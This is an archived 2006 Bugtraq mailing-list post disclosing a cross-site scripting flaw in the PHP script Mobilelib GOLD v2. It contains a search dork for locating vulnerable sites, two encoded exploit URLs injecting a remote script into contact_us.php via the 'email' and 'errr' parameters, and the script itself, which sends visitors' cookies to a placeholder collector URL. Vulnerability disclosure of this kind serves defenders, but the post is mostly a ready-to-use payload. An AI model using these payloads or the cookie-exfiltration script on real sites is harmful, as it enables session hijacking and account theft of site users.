lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061229200849.10280.qmail@securityfocus.com>
Date: 29 Dec 2006 20:08:49 -0000
From: gamr-14@...mail.com
To: bugtraq@...urityfocus.com
Subject: Re: XSS in script Mobilelib GOLD v2

/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
{
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dh
ttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dht
tp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.coo
kie); #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL & viP HaCkEr & HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## gamr-14 (at) hotmail (dot) com [email concealed] #############
########## Error-404 (at) msn (dot) com [email concealed] ##########
##########################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ